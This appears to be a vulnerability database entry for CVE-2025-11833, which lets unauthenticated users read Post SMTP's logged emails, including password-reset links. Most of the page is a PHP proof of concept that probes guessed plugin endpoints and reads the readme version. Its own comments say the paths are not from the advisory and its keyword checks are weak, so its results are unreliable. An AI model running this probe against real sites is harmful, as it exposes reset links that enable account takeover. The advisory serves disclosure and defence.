Security Vulnerability Report
CVE-2025-11833 CVSS 9.8 CRITICAL

CVE-2025-11833

Published: 2025-11-01 04:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the __construct function in all versions up to, and including, 3.6.0. This makes it possible for unauthenticated attackers to read arbitrary logged emails sent through the Post SMTP plugin, including password reset emails containing password reset links, which can lead to account takeover.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Post SMTP WordPress plugin <= 3.6.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
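<?php
/**
 * CVE-2025-11833 PoC - Post SMTP Unauthorized Email Access
 * This PoC demonstrates the missing capability check vulnerability
 * in Post SMTP plugin's __construct function
 *
 * Usage: php cve-2025-11833-poc.php <target-url>
 *
 * Reviewer notes:
 * - The advisory covers every release up to and including 3.6.0, so the
 *   readme check compares version numbers instead of matching a short list.
 * - The paths probed below come from this listing, not from the advisory.
 *   The advisory's own references point at Postman/PostmanEmailLogs.php and
 *   plugin changeset 3386160 (presumably the fix). A keyword hit is therefore
 *   only a lead and has to be confirmed by reading the response by hand.
 * - Defender view: a site on 3.6.0 or earlier needs a later plugin release,
 *   and password-reset links mailed while the logs were readable should be
 *   treated as disclosed.
 */
class PostSMTPPoC
{
    /** Highest affected release per the advisory ("up to, and including, 3.6.0"). */
    const LAST_AFFECTED_VERSION = '3.6.0';

    /** @var string Base URL of the site under test, without a trailing slash. */
    private $targetUrl;

    /**
     * @param string $url Base URL of the WordPress site to check.
     */
    public function __construct($url)
    {
        $this->targetUrl = rtrim($url, '/');
    }

    /**
     * Check if target is vulnerable by attempting to access email logs
     * The vulnerability exists because __construct function lacks capability check
     *
     * Prints its findings to stdout.
     *
     * @return bool True when one of the probed paths returned a body that the
     *              keyword heuristic accepts; false otherwise, including when
     *              only the readme version check matched.
     */
    public function checkVulnerability()
    {
        echo "[*] Checking vulnerability for CVE-2025-11833\n";
        echo "[*] Target: {$this->targetUrl}\n\n";

        // Method 1: Direct API endpoint access (if exposed)
        $endpoints = [
            '/wp-json/post-smtp/v1/logs',
            '/?rest_route=/post-smtp/v1/logs',
            '/wp-content/plugins/post-smtp/Postman/PostmanEmailLogs.php',
        ];

        foreach ($endpoints as $endpoint) {
            $response = $this->sendRequest($this->targetUrl . $endpoint);

            if ($this->isVulnerable($response)) {
                echo "[+] VULNERABLE: {$endpoint}\n";
                echo "[+] Access to email logs confirmed without authentication\n";
                return true;
            }
        }

        // Method 2: Check plugin version via readme
        $response = $this->sendRequest($this->targetUrl . '/wp-content/plugins/post-smtp/readme.txt');

        if ($this->checkVersion($response)) {
            echo "[!] Plugin version detected, manual verification needed\n";
        }

        return false;
    }

    /**
     * Extract email logs - simulates unauthorized access
     *
     * Only reports whether a response looks like log data; nothing is parsed
     * or stored.
     *
     * @return void
     */
    public function extractEmailLogs()
    {
        echo "\n[*] Attempting to extract email logs...\n";

        // In real attack, this would extract all logged emails
        // including password reset emails containing sensitive links
        $logEndpoints = [
            '/wp-admin/admin-ajax.php?action=post_smtp_get_logs',
            '/wp-json/post-smtp/v1/emails',
        ];

        foreach ($logEndpoints as $endpoint) {
            $response = $this->sendRequest($this->targetUrl . $endpoint);

            if ($this->containsEmailData($response)) {
                echo "[+] Email data accessible at: {$endpoint}\n";
                echo "[+] Contains sensitive information (password reset links, etc.)\n";
            }
        }
    }

    /**
     * Fetch a URL with a GET request.
     *
     * @param string $url Absolute URL to request.
     * @return string Response body, or '' when the transfer failed or the
     *                final HTTP status was not 200.
     */
    private function sendRequest($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        // Certificate verification is left at cURL's default (enabled): the
        // responses may contain mail contents, and an unverified connection
        // lets anyone on the path read or forge them.
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        // Redirects are still followed, so a redirect to a login page ends in
        // a 200 response; the keyword checks cannot tell that apart.
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

        $body = curl_exec($ch);
        $status = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        // A failed transfer or an error page must not be scanned for keywords:
        // 403/404 pages routinely contain words such as "log" or "email".
        if ($body === false || $status !== 200) {
            return '';
        }

        return $body;
    }

    /**
     * Keyword heuristic for "this looks like email log data".
     *
     * Weak by design: any page mentioning "email", "log" or "smtp" matches,
     * so a true result needs manual confirmation.
     *
     * @param string $response Response body ('' when the request failed).
     * @return bool
     */
    private function isVulnerable($response)
    {
        // Check if response contains email log data
        return (strpos($response, 'email') !== false ||
                strpos($response, 'log') !== false ||
                strpos($response, 'smtp') !== false);
    }

    /**
     * Keyword heuristic for mail header/field names in a response body.
     *
     * @param string $response Response body ('' when the request failed).
     * @return bool
     */
    private function containsEmailData($response)
    {
        // Check for email-related content
        return (strpos($response, 'to:') !== false ||
                strpos($response, 'subject:') !== false ||
                strpos($response, 'message_id') !== false);
    }

    /**
     * Read the "Stable tag" from the plugin readme and compare it with the
     * last affected release.
     *
     * @param string $response Body of readme.txt ('' when the request failed).
     * @return bool True when the stable tag is 3.6.0 or lower.
     */
    private function checkVersion($response)
    {
        // A non-numeric tag (for example "trunk") cannot be compared and is
        // reported as not detected.
        if (!preg_match('/^Stable tag:\s*(\d+(?:\.\d+)*)/mi', $response, $match)) {
            return false;
        }

        $version = $match[1];
        if (version_compare($version, self::LAST_AFFECTED_VERSION, '<=')) {
            echo "[!] Vulnerable version detected: {$version}\n";
            return true;
        }

        return false;
    }
}

// Main execution
if ($argc < 2) {
    echo "Usage: php cve-2025-11833-poc.php <target-url>\n";
    echo "Example: php cve-2025-11833-poc.php http://target.com\n";
    exit(1);
}

$poc = new PostSMTPPoC($argv[1]);
$poc->checkVulnerability();
$poc->extractEmailLogs();

/*
 * Impact Assessment:
 * - Unauthenticated attackers can read all logged emails
 * - Password reset emails may contain valid reset tokens
 * - Attackers can hijack user accounts including admin accounts
 * - Full site compromise possible through admin account takeover
 */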

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11833", "sourceIdentifier": "[email protected]", "published": "2025-11-01T04:15:42.660", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the __construct function in all versions up to, and including, 3.6.0. This makes it possible for unauthenticated attackers to read arbitrary logged emails sent through the Post SMTP plugin, including password reset emails containing password reset links, which can lead to account takeover."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/post-smtp/tags/3.5.0/Postman/PostmanEmailLogs.php#L51", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3386160/post-smtp", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/491f44fc-712c-4f67-b5c2-a7396941afc1?source=cve", "source": "[email protected]"}]}}